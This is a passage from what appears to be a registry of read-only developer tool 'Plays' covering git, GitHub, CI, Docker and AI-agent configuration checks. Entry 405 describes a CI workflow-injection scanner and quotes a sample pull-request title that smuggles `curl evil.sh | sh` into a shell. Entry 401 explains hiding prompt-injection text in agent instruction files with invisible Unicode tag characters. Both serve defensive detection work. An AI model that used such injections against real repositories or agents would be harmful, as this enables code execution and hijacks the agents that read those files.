↓309Commitment Capacity CheckDetect dated commitments made in sent Gmail/Slack messages colliding with Google Calendar capacity, travel buffers, focus blocks, or Google Tasks due dates.ROTE1 STEPSREAD ONLY3 ↓310Tracked LeaksFinds the files git is TRACKING that should never have been committed, and the gap between what a repo's .gitignore claims to exclude and what its index actually holds. Adding a pattern to .gitignore does nothing for a file that is already tracked, which is exactly why the same leak keeps coming back, so every finding is checked with `git check-ignore --no-index` and then dated and tested for reachability from a remote-tracking ref, because a pushed secret is a rotation job and an unpushed one is a rebase. Precision is the point: `.env.example`, `.env.sample` and `.env.local.example` are meant to be committed and are never flagged, a `!`-negated ignore rule is read as the repo re-including a file rather than as a gap, a credential-shaped file under a test fixture path is reported apart from one at the repo root, and a `.pem` with no PRIVATE KEY header or a `.npmrc` with no auth token is cleared by inspection instead of raised. Read-only, needs no credentials, and never prints the contents of any file it finds, only the path.ROTE2 STEPSREAD ONLY3 ↓311Repo Health SnapshotTop committers plus issues opened in the last N days for a GitHub repository, combined into one snapshotAPISESSIONSGITHUB3 STEPSREAD ONLY3 ↓312Return Warranty GuardianScan Gmail receipts and order confirmations to extract structured purchase records and produce return-window and warranty countdown reports with zero email mutations.ROTE1 STEPSREAD ONLY3 ↓313Panel Collision CheckDetect Greenhouse interview panels scheduled during a panelist's active on-call rotation, release freeze window, or incident load — then propose reschedule alternatives without editing calendars.ROTE1 STEPSREAD ONLY3 ↓314What Should I AutomateMost of what you repeat is not worth automating, and nothing tells you which part is. A one-day burst of 19 identical prompts is a loop, not a habit; a request you make twice a week for three months is the thing worth keeping. This reads your local Claude Code and Codex transcripts, drops harness-injected noise, clusters near-duplicate requests, attributes the real token cost of each cluster and prices it against the live LiteLLM rate table, then returns a ranked CRYSTALLIZE / NOT YET / DO NOT with the reason for each. It refuses to recommend a burst no matter how many times that burst ran. Honest about its limits: the Play-shape test counts action verbs and enumerated steps as a proxy for 'this is a procedure', so it measures shape rather than meaning; recurrence is activity on two or more separate days, which does not separate a weekly habit from two adjacent days; and the spend it reports is what you already paid, not what crystallizing would save. Reads only local files and one public rate table, writes only inside its own run workspace, carries no credentials.ROTE5 STEPSREAD ONLY3 ↓315Invisible DiffReviews only added Git source lines for directional controls, invisible identifier characters, normalization collisions, and high-confidence mixed-script lookalikes. Returns CLEAN, REVIEW, BLOCK, or INCOMPLETE with escaped path-line evidence. Run with no arguments for a deterministic demo.ROTE8 STEPSREAD ONLY3 ↓316Merged Branch EvidenceDecides which local branches are safe to delete, and says why for each one. `git branch --merged` answers a narrower question than the one you are asking: it reports whether the base branch contains the branch tip as an ancestor, which is true after a merge commit or a fast-forward and false after every squash and every rebase. On a repository that squashes, branches whose work shipped weeks ago keep reporting as unmerged, and `git cherry` agrees with it because a squash rewrites the patch ids too. This play gathers four independent sources instead: reachability, the pull request number GitHub appends to a squash commit subject, the pull request state from gh, and whether the branch still holds commits the base does not. It then names a verdict per branch with the evidence behind it. Two failure directions matter and both appear here: a branch that merged invisibly and gets kept forever, and a branch whose pull request merged but which has kept receiving commits since, where deleting on the strength of `merged` drops that work. Without gh a squash cannot be ruled out from git alone, so those branches are reported as undetermined rather than guessed at. Read-only: it never checks out, deletes, or writes anything, and prints the delete command for you to run yourself.ROTE6 STEPSREAD ONLY3 ↓317Parent Medication DispenserSmart interval-based medication alert dispatcher for parents and family members with interactive Telegram confirmation cards.ROTE1 STEPSREAD ONLY3 ↓318Oss Issue Claim GateBefore you write a line of code against an open-source issue, find out whether it is already someone else's. Reads the issue, every comment, and the cross-referenced pull requests, and returns one of three answers - CLEAR, TAKEN, or UNKNOWN. Claim detection covers the polite forms people actually use - asking whether anyone is on it and then starting, offering to take it, saying a fix is ready - not just the direct ones. Five ways an issue is taken and it checks all five - an assignee who is not you, a label the repository uses to reserve work, a comment from someone else claiming it, an open pull request from another author, and an issue that is not open. UNKNOWN is a real third state - a signal it could not read never collapses into CLEAR, because a false CLEAR costs your standing in a repository and a false TAKEN costs one issue. Public repositories need no credentials at all - the read path is unauthenticated. GITHUB_TOKEN is optional, raises the rate limit, and is the only way the claim comment gets posted. Writes nothing unless you pass post_claim, the verdict is CLEAR, and you have not already commented - and when it does write, it returns the comment id so you can undo it. Runs on python3 alone.ROTE5 STEPSREAD ONLY3 ↓319Keep My NotesKeep My Notes When I Re-export merges a fresh CSV export with a previous annotated copy by exact stable-ID string. Fresh platform values win; only explicitly named manual columns carry forward, new rows receive blank manual fields, missing rows are archived separately, and changed matched rows include old/new platform evidence for review. Inputs are read-only and proved unchanged. After every refusal preflight passes, the Play uses one run-owned staging directory beside output_dir, creates output_dir if absent, and exclusively creates refreshed.csv, missing-from-fresh.csv, needs-review.csv, and refresh-receipt.json without overwriting existing paths. It reopens and verifies every output before reporting VERIFIED, removes temporary state on terminal paths, and bounds post-commit rollback to unchanged files created by that run. Canonical JSON is complete; the one-line summary is intentionally lossy.ROTE11 STEPSREAD ONLY3 ↓320Check App HealthCheck deployed app health endpoints and fetch recent commits if unhealthyROTE1 STEPSREAD ONLY3 ↓321ShipproofProves that an exact GitHub commit passed CI, matches the commit fingerprint exposed by a deployment, and is visibly live on the public page.ROTE4 STEPSREAD ONLY3 ↓322Java Smoke CheckCompile a no-build-tool Java project and smoke-test that it boots and exits cleanly with scripted stdinROTE4 STEPSREAD ONLY3 ↓323Precog PreflightNeural pre-flight for a landing page: renders it in real Chrome, measures pixels and copy, forecasts CTA click-through with every coefficient printed, and ranks what to change. Exits non-zero on a weak grade so it can gate a deploy.ROTE2 STEPSREAD ONLY3 ↓324Invisible Side Effect CensusSnapshots local state before and after a task, then diffs the two states and reports side-effect changes across files, git, ports, processes, and installed packages.ROTE4 STEPSREAD ONLY3 ↓325Text To ActionConvert unstructured text into a concise, evidence-only actionable plan.ROTE0 STEPSREAD ONLY3 ↓326Agent ReadyCan an AI agent actually use your website? Scans any site against the agent-discovery standards — ARD capability manifest, RFC 9727 API catalog, RFC 8414/9728 OAuth discovery, auth.md, MCP server card, A2A agent card, agent-skills index, WebMCP, Link headers, markdown negotiation, robots/sitemap, DNS-AID — and returns one classified briefing: a readiness level 0-5, every check bucketed pass/fail/neutral, and a concrete fix for each failure. Optional fail_below turns it into a CI gate. Read-only, no credentials, one external call.ROTE2 STEPSREAD ONLY3 ↓327Github Pr QaInspect a GitHub pull request, test its user-facing behavior through an accessible deployment or isolated local fallback, and return a PASS/FAIL browser QA report.SESSIONS0 STEPSREAD ONLY3 ↓328PlayfitRecommends a small set of Community Plays by matching the caller's project, harness-accessible tools and apps, recent tool-use signals, workflows, and interests against bounded registry searches and verified host readiness.ROTE1 STEPSREAD ONLY3 ↓329Docker ScrubReclaim Docker disk space safely. Scans for dangling images, unused volumes, and build cache; computes a cleanup plan; optionally executes it behind the apply=true gate. Read-only by default; writes only on explicit opt-in. Zero credentials, no auth. ROTE4 STEPSREAD ONLY3 ↓330Domain Perimeter HealthComprehensive DNS propagation, SSL/TLS certificate lifespan, HTTP security posture, and CDN edge diagnostic. Probes Cloudflare, Google, and Quad9 DoH in parallel, audits TLS cipher and certificate expiration, inspects HSTS/CSP headers, and generates a security grade with a stage ledger.ROTE7 STEPSREAD ONLY3 ↓331Github Nextest Ci ReportBuilds a self-contained interactive report from GitHub Actions nextest logs, with every test execution, sortable durations, name filters, clickable histogram bins, and CSV export.ROTE4 STEPSREAD ONLY3 ↓332Pod Cidr CheckCheck each Kubernetes node's podCIDR across two cluster contexts and flag overlap.ROTE2 STEPSREAD ONLY3 ↓333Token AuditAI Prompt & Token Budget Auditor Play: Audits token counts, prompt bloat, and API costs.ROTE1 STEPSREAD ONLY3 ↓334Cloud Zombie HunterZombie Cloud & Cost Waste Hunter Play: Audits unattached volumes and idle cloud resources.ROTE1 STEPSREAD ONLY3 ↓335Git PruneSmart Git Branch Janitor: Safely audits and prunes merged local branches.ROTE1 STEPSREAD ONLY3 ↓336Cleanup Old Git WorktreesRemoves stale linked worktrees from any local Git repository while preserving the primary worktree, the current worktree, locked worktrees, and parents of registered nested worktrees.ROTE1 STEPSREAD ONLY3 ↓337DevfixRead-only repository failure triage with evidence-backed fixes.ROTE1 STEPSREAD ONLY3 ↓338Why Cant This Pr MergeExplain exactly why one GitHub pull request cannot merge, who owns each blocker, and the next actionAPISESSIONSGITHUB8 STEPSREAD ONLY3 ↓339Whats Holding This PortDiagnoses whether a local TCP or UDP port is free, attributes observable owners, optionally probes the endpoint, and reports one evidence-backed verdict.ROTE4 STEPSREAD ONLY3 ↓340Systems Knowledge Gap Map RecursiveRecursively crawl a Notion knowledge base and compare a resource against detailed systems knowledge gapsAPIBROWSERSESSIONSNOTION0 STEPSREAD ONLY3 ↓341PlayproofTrust-audits a rote Play by validating its inputs and inspecting its structure.ROTE8 STEPSREAD ONLY3 ↓342Stop Docker DesktopList and stop user-owned Docker Desktop processes without sudo; launch Docker Desktop manually afterward.ROTE1 STEPSREAD ONLY3 ↓343List My Github IssuesLists GitHub issues assigned to the authenticated gh user in one repository and renders them as a markdown table.ROTE2 STEPSREAD ONLY3 ↓344Posthog Project DauRetrieve daily active users (distinct persons per day) for a PostHog project over a lookback window via HogQL.APISESSIONSPOSTHOG-MCP4 STEPSREAD ONLY3 ↓345Cap Table ModelDeterministic, dependency-free cap-table calculator for existing ownership, estimated pre-round SAFE positions, and priced financing rounds. Handles pre- and post-money SAFEs, caps, discounts, chronological MFN elections, YC 7% SAFEs, Series issuance, option-pool refreshes, and exact share reconciliation. Priced-round returns pre-round and post-round views from one solve. Ships one BigInt engine, requires only Node 18 or newer, and performs no network access, authentication, or runtime installation. Based on the transaction semantics of https://github.com/1984vc/cap-table.ROTE1 STEPSREAD ONLY3 ↓346Github Review Queue By StackRank open GitHub PRs that request the authenticated user's review, ordering stack bottoms first so each review unblocks its dependents.APISESSIONSGITHUB5 STEPSREAD ONLY3 ↓347Git Worktree Pr Cleanup ReportReport git worktrees whose associated GitHub pull requests are merged and local trees are clean or prunable.SESSIONS0 STEPSREAD ONLY3 ↓348Github Issue CreateionCreate a GitHub issue in a repository from a title and Markdown bodySESSIONS0 STEPSREAD ONLY3 ↓349Pr Manager Release ContextGathers release-level commit/PR/file-change context from a local git repo and produces a structured changelog-grade technical handoff package for the bob-announcement-manager agent.ROTE0 STEPSREAD ONLY3 ↓350Stale ApprovalFinds GitHub pull requests you previously approved that later received new commits, so you know which approvals may no longer reflect the current code and deserve another look. Read-only (gh api GET calls only); never comments, re-reviews, or merges. Honestly reports PRs it could not verify (rate limit/permission errors) and search truncation, and supports mode=sample for a cold-start demo with no real GitHub calls.ROTE1 STEPSREAD ONLY2 ↓351Which Actually RunsAnswers one question on any Unix machine: when you type a command, which copy actually runs, and what did it beat. Four unrelated causes produce that same symptom and none of them announce themselves. A version manager puts a shim ahead of the system copy, which is correct until two of them fight or a shim points at a version you uninstalled and resolves to nothing. Homebrew installs to /opt/homebrew on Apple silicon and /usr/local on Intel while the system copy stays in /usr/bin, so which one wins depends on a PATH order nobody set on purpose. Under WSL the Windows PATH is appended and Windows executables are reachable, so a command can resolve to a Windows program with Windows path semantics, or fail to resolve at all while its .exe sits on PATH and the shell reports command not found about a tool that is plainly installed. And an integration such as Docker Desktop drops symlinks into the filesystem that only resolve while it is running: the directory listing shows the tool, running it finds nothing, and a different copy further down PATH silently takes over. This names the winning path for each watched command, what it beat, and which of those causes explains it, then reads your shell startup files to show which line put each directory on PATH in the first place, because knowing that nvm beats Homebrew does not tell you which file to edit. Read-only by construction: it reads PATH, stats files, and parses the text of startup files without ever sourcing them, so a malformed rc file cannot execute anything. A line assigning a secret-looking name is reported as present and never echoed. Nothing is modified and no command is repaired. Needs python3 and nothing else. It reports the PATH of the shell that invoked it and says so, which is why a login shell and an editor terminal can legitimately disagree, and it takes a PATH string if you want to ask about a different one.ROTE3 STEPSREAD ONLY2 ↓352Cicd Failure DiagnosticDiagnoses failed GitHub Actions runs, traces root cause through repository evidence, and produces validated patchesAPISESSIONSGITHUB18 STEPSREAD ONLY2 ↓353Is It TakenAnswers the question worth asking before you write a line: has someone already published this. The public registry went from 242 plays to 411 in twenty-four hours, so nobody can hold it in their head, and rote play search answers one query at a time using the words you happened to choose. This fans your idea out into a dozen queries drawn from its own content words, so a play that solves the same problem in different vocabulary still surfaces, then ranks what comes back by how close it actually is rather than by how popular it is. A play with forty downloads that shares one incidental word is not a collision; a play with three downloads whose name is your idea is. It returns one of four verdicts. Already built, when something matches closely enough that you should read it before writing anything. Crowded, when there is no exact match but enough adjacent work that yours has to differ in a way a stranger can see. Adjacent work exists, when one or two are close enough to read first. And nothing close found, which is deliberately not phrased as proof: matching here is lexical, two people can describe the same idea in words that share nothing, and a confident all clear from a word matcher would be the most damaging thing this could say. So the limit is printed in the output every time, along with any query that failed, because a failed query is not an empty result. I built this after losing several hours to exactly this mistake: I published a play that already existed under the same name, by an author a day ahead of me, because my own registry survey used the vocabulary of the ideas I had already chosen rather than the one I later built. Read-only. It searches the public registry through rote, reads nothing local, writes nothing, and needs no credentials.ROTE3 STEPSREAD ONLY2 ↓354Free Grants For MeFind current federal grant opportunities and conservatively screen published applicant and geographic criteria against a supplied profile.ROTE2 STEPSREAD ONLY2 ↓355Free Scholarship MoneyFind legitimate scholarship money matched by home state, study state, and study levelROTE2 STEPSREAD ONLY2 ↓356Shell Startup CostMaps likely shell-startup cost without executing any line extracted from a user rc file. Independent roots measure only a zsh or bash invocation with user and global rc loading disabled and read the supported user rc files as text. The clean-shell child strips BASH_ENV, ENV, PROMPT_COMMAND, CDPATH, and every exported BASH_FUNC_* variable; bash also runs privileged with startup disabled and executes builtin true. A classifier then reports static candidates such as completion setup, environment-manager hooks, command substitution, and sourced files. Candidates never receive invented timings: the clean-shell number is only an executable floor, not configured startup duration, and each candidate is explicitly unmeasured. Missing rc files are an expected absence; unreadable files make the result incomplete. The play never sources, evals, or runs a matched line, so source text that writes files or reaches the network remains inert.ROTE4 STEPSREAD ONLY2 ↓357Port Collision MapJoins convention-anchored port declarations with a live local listener snapshot. Listener collection and project traversal run independently, then the join reports cross-project conflicts, already-held declarations, and non-loopback bindings. Project identity is the canonical declaration directory, so same-named folders under different roots do not collapse. Both files read and directories visited have explicit global bounds, and unavailable listener evidence, unreadable or oversized configs, missing roots, and truncated traversal force an INCOMPLETE verdict. Non-loopback bindings are only potential reachability evidence because firewalls and namespaces are outside scope. Read-only: it lists sockets and reads config files, and starts or stops nothing.ROTE3 STEPSREAD ONLY2 ↓358Reward Hacking ForensicsDetect reward hacking, mode collapse, and proxy decorrelation in RLHF (PPO/GRPO) training runs via multi-signal rolling correlation and early-baseline verification.ROTE3 STEPSREAD ONLY2 ↓359Find Wasted TokensFind giant files and useless junk eating up your AI tokens. Scans your AI agent's chat history to show which files were loaded into memory but never actually used, how much money you wasted, and what you can safely remove. Zero setup, zero API keys, needs only python3.ROTE1 STEPSREAD ONLY2 ↓360Catch Sneaky ChangesCatch secret files, deleted code, or hidden changes your AI agent made without telling you. Compares your workspace before and after an agent session so nothing unexpected slips into your code. Zero setup, zero API keys, 100% safe and read-only.ROTE1 STEPSREAD ONLY2 ↓361Documentation Change Coupling ProofGates repository and PR documentation against the current public contract and its Git coupling history. Use it on interface-changing PRs, before each release cut, and during incidents caused by misleading runbooks. Four sibling probes prove deleted paths/scripts, prove removed flags/config keys, measure whether relevant interface commits are newer than their docs, and audit evidence completeness; synthesis emits PROVEN_STALE only for a current contradiction backed by removal evidence, TEMPORAL_RISK for code/CLI/config/public-interface changes after relevant docs last changed, and UNKNOWN when required evidence is missing. Directory links remain present while tracked descendants still resolve, and historical path proof verifies that the claimed file or directory itself disappeared across the cited commit. Python flags count as current only when AST inspection proves an imported argparse/optparse parser receiver or imported Click/Typer option declaration; historical token removal likewise requires a parser-backed interface transition. Comments, standalone strings, lookalike add_argument methods, malformed code, and unsupported token-only sources never produce a clean COUPLED or false PROVEN_STALE verdict. Findings are ordered into a remediation queue. It reads tracked files and Git metadata only, never executes repository code or scripts, writes nothing, makes no network calls, and does not print source patches or secrets. Run with repo=/absolute/path/to/repository, or omit repo for the bundled demo repository and history evidence. Limits: Markdown contract extraction is conservative, semantic prose truth beyond recognized paths/scripts/flags/config keys needs human review, non-Python CLI declarations without parser-backed inventory remain UNKNOWN, and rewritten/shallow history constrains proof.ROTE5 STEPSREAD ONLY2 ↓362Professor Feedback To Fix PlanTranslate supplied feedback into local areas to inspect and an evidence-based fix plan. Read-only: no project code execution, writes, network calls, or secret values.ROTE9 STEPSREAD ONLY2 ↓363What Changed While I Was GoneCatch up on bounded local Git history and group evidence into work likely to affect a supplied context. Read-only: no project code execution, writes, network calls, or secret values.ROTE9 STEPSREAD ONLY2 ↓364Pitch Claim CheckerProvide a structured pitch-claim-checker plan from supplied project context, with explicit uncertainty and no external side effects.ROTE9 STEPSREAD ONLY2 ↓365Sponsor Track MatcherProvide a structured sponsor-track-matcher plan from supplied project context, with explicit uncertainty and no external side effects.ROTE9 STEPSREAD ONLY2 ↓366Fallback Plan GeneratorProvide a structured fallback-plan-generator plan from supplied project context, with explicit uncertainty and no external side effects.ROTE9 STEPSREAD ONLY2 ↓367Hackathon Rule CheckerProvide a structured hackathon-rule-checker plan from supplied project context, with explicit uncertainty and no external side effects.ROTE8 STEPSREAD ONLY2 ↓368Hackathon HandoffProvide a structured hackathon-handoff plan from supplied project context, with explicit uncertainty and no external side effects.ROTE8 STEPSREAD ONLY2 ↓369Teammate Code Handoff DecoderDecode a half-finished local feature into observed progress, unfinished evidence, dependencies, and next questions. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓370Merge Conflict TranslatorExplain the competing intentions in a merge-conflict block and provide a safe resolution plan without changing files. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓371Magic Number ArchaeologistGather bounded static evidence around constants that may deserve names or documentation. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓372Hidden Coupling DetectorMap possible hidden coupling through config, names, schemas, files, and conventions. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓373Feature Flag GraveyardClassify feature-flag evidence as active, forced, undocumented, duplicated, or possibly obsolete. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓374Feature Dependency ChainTrace local feature-name evidence across UI, routes, services, configuration, storage, and tests. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓375Error Avalanche FinderPrioritize likely root errors from a supplied build or test log using local project evidence. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓376Dependency Breakup PlannerMap static local evidence before removing a dependency; never changes manifests or source. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓377Copy Paste Debt FinderIdentify potential duplication evidence for review without claiming similar code is necessarily debt. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓378Config Ownership MapperMap configuration definitions, consumers, overrides, and apparent ownership without printing values. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓379Commit Story BuilderReconstruct a bounded Git-history story into goal, stages, reversals, and final evidence. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓380Code Review Question GeneratorGenerate evidence-linked review questions from local context and project signals. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓381Abandoned Experiment FinderReport evidence of old or parallel implementations without deleting anything. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓3823 Am Debug HandoffBuild a concise debugging handoff from notes, logs, and bounded local context. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY2 ↓383Rest Endpoint Conformance TesterDomain Analysis & Developer Utility for rest-endpoint-conformance-tester: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY2 ↓384Playoff Leaderboard ScoutDomain Analysis & Developer Utility for playoff-leaderboard-scout: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY2 ↓385Open Meteo Weather GateDomain Analysis & Developer Utility for open-meteo-weather-gate: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY2 ↓386Omen Killer Db Pool DoctorDomain Analysis & Developer Utility for omen-killer-db-pool-doctor: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY2 ↓387Notion Mcp Sprint ScaffolderSecurity & Governance Sentinel for notion-mcp-sprint-scaffolder: Scans authorization tokens, inspects protocol payloads, checks CORS policies, and mitigates OWASP Top 10 vulnerabilities.SESSIONS6 STEPSREAD ONLY2 ↓388Money Follow Brother Prompt CondenserDomain Analysis & Developer Utility for money-follow-brother-prompt-condenser: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY2 ↓389Money Follow BrotherDomain Analysis & Developer Utility for money-follow-brother: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY2 ↓390Isshin Sword Saint LinterDomain Analysis & Developer Utility for isshin-sword-saint-linter: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY2 ↓391Github Pr Browser VisualizerHeadless Browser & E2E Auditor for github-pr-browser-visualizer: Launches headless Chrome/Chromium to audit Core Web Vitals, simulate user journeys, and render PDF reports.SESSIONS6 STEPSREAD ONLY2 ↓392Dockerfile Micro ArchitectDevOps & Container Optimization Engine for dockerfile-micro-architect: Scans build artifacts, optimizes Dockerfile multi-stage layers, and automates CI/CD deployments.SESSIONS6 STEPSREAD ONLY2 ↓393Cypher Network SpycrapDomain Analysis & Developer Utility for cypher-network-spycrap: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY2 ↓394Browser Lighthouse AuditorHeadless Browser & E2E Auditor for browser-lighthouse-auditor: Launches headless Chrome/Chromium to audit Core Web Vitals, simulate user journeys, and render PDF reports.SESSIONS6 STEPSREAD ONLY2 ↓395Broken Link CrawlerHeadless Browser & E2E Auditor for broken-link-crawler: Launches headless Chrome/Chromium to audit Core Web Vitals, simulate user journeys, and render PDF reports.SESSIONS6 STEPSREAD ONLY2 ↓396Secrets LeakSecret exposure scanner for codebases. Scans source code for exposed API keys, passwords, tokens, private keys, and other credentials. Returns a deterministic verdict (CLEAN / LOW_RISK / MEDIUM_RISK / HIGH_RISK / CRITICAL) with redacted findings and prioritized remediation steps. Read-only, no credentials needed. ROTE3 STEPSREAD ONLY2 ↓397Merge CanaryWill your feature branch still work after merging latest main? Creates a temporary merge, checks for conflicts, and classifies the result as GREEN, TEXT_CONFLICT, SEMANTIC_CONFLICT, BRANCH_ALREADY_RED, or INDETERMINATE. Never modifies your current checkout. Read-only, no credentials. ROTE3 STEPSREAD ONLY2 ↓398Shadow SchedulerFinds every recurring job that runs behind your back, grouped by what it actually does rather than which scheduler owns it. Reads launchd agents and daemons, the user crontab, and GitHub Actions schedule triggers, normalises all three to a single shape with an estimated runs-per-day, then surfaces the findings that matter: the same effect scheduled twice by different systems, jobs whose target binary or script no longer exists, and the heaviest consumers of your machine. Read-only, no credentials, nothing is executed or unloaded.ROTE3 STEPSREAD ONLY2 ↓399Automation RealityA scheduled job that exits 0 is not a job that worked. Answers one question about THIS machine: for every recurring automation on it, is the work still actually happening, and did its output land? Reconciles the DECLARED schedule against OBSERVED reality across launchd (StartInterval and StartCalendarInterval in ~/Library/LaunchAgents, cross-checked against launchctl's own loaded state, run counter and last exit code), the user crontab, and GitHub Actions workflows carrying a schedule: trigger in the repositories on this disk. Observation comes from the jobs' own output: arrival times are recovered from the timestamps INSIDE each log, clustered so that fifty lines from one run count as one run, and the median gap between arrivals is compared against the declared interval. Ranks by consequence rather than by scheduler: an automation that has silently stopped is CRITICAL, because the person believes it is running; a scheduled workflow in a repository of yours with no commit for 60 days is HIGH, because GitHub disables those silently and tells nobody; a declared interval that disagrees with observed arrivals by a factor is HIGH, since it means the job is failing early and retrying, the machine slept through the window, or something other than that schedule is also starting it; a job with no output path at all is MEDIUM, because nobody can tell whether it worked - but only after looking for the job's OWN run store first, since a job that keeps a per-run ledger of its own (a sqlite table with a timestamp and an exit code, a JSONL run log, a stamp file whose mtime tracks runs) has no reason to ask launchd to capture its stdout, and grading it unobservable from the plist alone is this play's own thesis failing one level down. Candidate locations are derived from the job's own ProgramArguments rather than guessed globally, sqlite is opened through the mode=ro&immutable=1 URI so a live database is never locked and no -wal/-shm sidecar is ever created, only the timestamp and outcome columns are projected and never a row's payload, and a store that exists but cannot be read is its own honest class rather than either silence or a clean bill of health. A fourth stage re-opens every CRITICAL and HIGH candidate - the plist file, launchctl's live record, the log file, the workflow line - and returns CONFIRMED, WITHDRAWN or UNCERTAIN quoting what it read; the withdrawals matter as much as the confirmations, since a plist edited after the last run and a stale second clone of a repository you push to daily both look exactly like a dead automation until something checks. Excluded and counted, never reported: a job disabled on purpose and saying so, a RunAtLoad one-shot, a KeepAlive resident service, Apple's own agents, an output path of /dev/null, and a repository whose origin is not yours. READ-ONLY: launchctl list, launchctl print and git log are queries, and nothing is ever loaded, unloaded, edited, enabled, disabled or triggered. No credentials, no network, no API. Needs python3 and, for the launchd source, launchctl and plutil.ROTE3 STEPSREAD ONLY2 ↓400Cors MismatchReads both halves of a repository and answers whether the browser will refuse your own frontend's calls to your own backend. 8 probes derive every origin the browser sends from (vite server.port, next and create-react-app defaults, package.json homepage, CNAME), every base URL the client calls (fetch, axios, ky, VITE_ and NEXT_PUBLIC_ defaults), and the allowlist the server declares (express cors, FastAPI CORSMiddleware, Flask-CORS, Django, Spring, nginx), then pairs them into ALLOWED, BLOCKED or BLOCKED-AT-PREFLIGHT with a file and line on both sides. Registration order is read across files, one level deep, so an express app that calls cors() in app.js and mounts auth from routes/index.js is reported with both file:line locations, as is a Django MIDDLEWARE entry or a Starlette add_middleware naming a local module. Comments, docstrings, tests and vendored trees are never read for a finding. It does not contact a server, require one running, or follow an import git does not track, and it reports UNKNOWN rather than a pass whenever either half is missing.ROTE8 STEPSREAD ONLY2 ↓401Standing OrdersInstruction files are standing orders: an agent loads AGENTS.md, CLAUDE.md, GEMINI.md, .cursorrules, .clinerules, .windsurfrules and copilot-instructions.md every session without being asked, and after the commit that introduced them they never appear in a diff again. This reports three facts about that surface and never claims intent. Which files actually apply, including nested ones below the repository root that people forget are loaded and the global ones under your home directory that no repository diff can show. Which of them no human ever reviewed: EXCLUDED_FROM_REVIEW cites the ignore rule and line that excludes the file, which also means a teammate who clones the repository does not have it and their agent is working from different instructions than yours; NEVER_IN_A_DIFF is an untracked file nobody added; DIFFERS_FROM_COMMITTED is content that no longer matches what was reviewed. And what is in them that a reader cannot see: HIDDEN_TEXT_DECODES means the file carries Unicode tag characters in the E0000 block, the invisible prompt injection mechanism, which are formed by adding an offset to ordinary ASCII and therefore decode straight back, so the hidden sentence is printed rather than merely counted. INVISIBLE_CHARACTERS covers zero-width characters, bidirectional controls, soft hyphens and variation selectors sitting inside a word. A variation selector after a symbol is emoji presentation and is never reported, because every warning sign in an instruction file would otherwise be a finding. A difference that survives only as a carriage return at end of line is not a changed instruction, so a checkout on a Windows drive does not report every file as unreviewed. Pass root=demo, the default, to run the bundled corpus with nothing set up. Reads files only: it never executes anything, never writes, and reads no credentials. Zero credentials, python3 and git.ROTE2 STEPSREAD ONLY2 ↓402Slop SurgeonHunts down AI-generated dead code and orphan dependencies, verifies safe excision against your test suite, and commits a clean branch.ROTE1 STEPSREAD ONLY2 ↓403Venv RotAnswers which Python actually runs the repository you are standing in, which pip installs into it, and whether the virtualenv beside it is already dead. 7 probes read what the project declares in .python-version, runtime.txt, requires-python and Pipfile, resolve every python3, pyenv shim and conda prefix through its symlink chain to a real prefix, and census every pyvenv.cfg to say whether the interpreter it names still exists on disk. It pairs declared dependencies against the imports the code makes, opencv-python against cv2, and names the standard library module a script directory shadows. Tests, docstrings and vendored trees are never read for a finding, an import inside try/except ImportError is never reported, and it does not install, activate or delete anything. PEP 668 has no marker on Windows, so error: externally-managed-environment cannot fire there. With no Python marker the answer is UNKNOWN, never a pass. Catches the ModuleNotFoundError that follows a successful install.ROTE7 STEPSREAD ONLY2 ↓404Heal AgentsYour CLAUDE.md is probably lying to your agent - commands that no longer exist, files deleted weeks ago, rules that contradict each other. Your agent reads it all, believes every word, and wastes your tokens hitting walls. heal-agents is a 60-second checkup for your repo's agent setup (CLAUDE.md, AGENTS.md, cursor rules, GEMINI.md, MCP + settings). Seven probes run in parallel and check every claim against reality: does each promised command actually exist? does every referenced file still exist - and if not, when exactly did git delete it? is the file so bloated your agent ignores it? any leaked secrets, dangerous permission allowlists, risky hooks, dead MCP servers, or retired model pins? You get one honest verdict - READY, DRIFTING, or ROTTEN - with every finding naming the exact file and the fix. Zero setup, zero risk: no accounts, no API keys, needs only python3, and it never writes or executes anything from your repo - that is why the access card proudly says none all the way down. Run it once to learn the truth; schedule it daily to catch drift the day you cause it.ROTE9 STEPSREAD ONLY2 ↓405Workflow InjectionAnswers one question about your CI: can somebody who opens a pull request or an issue run code in it? A GitHub Actions runner substitutes every ${{ ... }} as TEXT into the script before bash ever sees it, so a pull request titled `"; curl evil.sh | sh; #` becomes a command rather than a string. This finds every attacker-controlled expression interpolated into a `run:` block, or into actions/github-script's `script:`, which is the same eval sink one language over, and grades each one by the trigger that reaches it, because the trigger is the entire difference between a nuisance and a repository takeover: under pull_request_target, issue_comment, issues, pull_request_review, workflow_run or discussion the job holds the base repository's secrets and a writable token, so an injection is critical; under plain pull_request a fork runs with no secrets and a read-only token, so the same expression is medium; and an expression whose field no declared trigger ever populates is reported, graded low, and said to be unreachable 